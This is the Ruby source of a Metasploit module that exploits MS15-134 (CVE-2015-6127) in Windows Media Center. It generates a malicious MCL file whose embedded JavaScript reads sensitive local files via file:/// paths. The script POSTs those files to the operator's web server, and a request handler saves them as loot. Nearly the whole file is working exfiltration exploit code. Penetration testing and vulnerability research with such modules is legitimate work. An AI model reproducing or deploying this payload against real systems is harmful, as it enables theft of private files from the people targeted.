metasploit-framework/modules/auxiliary/server/ms15_134_mcl_leak.rb

171 lines
4.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'cgi'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'MS15-134 Microsoft Windows Media Center MCL Information Disclosure',
'Description' => %q{
This module exploits a vulnerability found in Windows Media Center. It allows an MCL
file to render itself as a HTML document in the local machine zone by Internet Explorer,
which can be used to leak files on the target machine.
},
'Author' =>
[
'Francisco Falcon', # Vuln discovery & PoCs & Detailed write-ups & awesomeness
'sinn3r'
],
'References' =>
[
['CVE', '2015-6127'],
['MSB', 'MS15-134'],
['URL', 'https://blog.coresecurity.com/2015/12/09/exploiting-windows-media-center/'],
['URL', 'http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference']
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 8 2015",
))
register_options(
[
OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
OptPath.new('FILES', [true, 'Files you wish to download', ::File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files_win.txt')])
], self.class)
end
def receiver_page
@receiver_page_name ||= Rex::Text.rand_text_alpha(5)
end
def js
%Q|
function sendFile(fname, data) {
var xmlHttp = new XMLHttpRequest();
if (!xmlHttp) { return 0; }
xmlHttp.open('POST', '#{get_uri}/#{receiver_page}', true);
xmlHttp.setRequestHeader('Content-type', 'multipart/form-data');
xmlHttp.setRequestHeader('Connection', 'close');
var body = 'fname=' + encodeURIComponent(fname) + '&data=' + data.toString();
xmlHttp.send(body);
}
function getFile(fname) {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open('GET', fname, false);
xmlHttp.send();
return xmlHttp.responseBody.toArray();
}
var files = [#{load_file_paths * ","}];
for (var i=0; i < files.length; i++) {
try {
var data = getFile('file:///' + files[i]);
sendFile(files[i], data);
} catch (e) {}
}
|
end
def generate_mcl
%Q|<application url="#{datastore['FILENAME']}">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE-edge">
</head>
<body>
<script type="text/javascript">
#{js}
</script>
</body>
</html>
</application>
|
end
def load_file_paths
@files ||= lambda {
buf = ''
::File.open(datastore['FILES'], 'rb') do |f|
buf = f.read
end
buf.split.map { |n| "\"#{n.gsub!(/\\/, '/')}\"" }
}.call
end
def run
exploit
end
def start_service(opts = {})
super
print_status("Generating #{datastore['FILENAME']}...")
mcl = generate_mcl
file_create(mcl)
print_status("Pass #{datastore['FILENAME']} to the target you wish to exploit.")
print_status("When the MCL is executed, it should start sending data (files) back")
print_status("back to our web server.")
end
def is_ie?(request)
fp = fingerprint_user_agent(request.headers['User-Agent'])
fp[:ua_name] == HttpClients::IE
end
def parse_data(data)
buf = ''
data.scan(/\d+/).each do |n|
buf << n.to_i.chr
end
buf
end
def parse_body(body)
params = CGI::parse(body)
{
fname: ::File.basename(params['fname'].first),
data: parse_data(params['data'].first)
}
end
def on_request_uri(cli, request)
unless is_ie?(request)
print_error('Client is not Internet Explorer.')
send_not_found(cli)
return
end
unless /#{receiver_page}/i === request.uri
print_error("Unknown request: #{request.uri}")
send_not_found(cli)
return
end
buff = ''
print_status("Receiving data...")
file = parse_body(request.body.to_s)
p = store_loot('mcl.file', 'application/octet-stream', cli.peerhost, file[:data], file[:fname])
print_good("#{file[:fname]} saved as: #{p}")
# If you are kind of lazy to open the saved files, and just sort of want to see the data,
# here you go (handy for debugging purposes, but against a larger network this is probably
# too much info)
vprint_status("File collected: #{file[:fname]}\n\n#{Rex::Text.to_hex_dump(file[:data])}")
end
end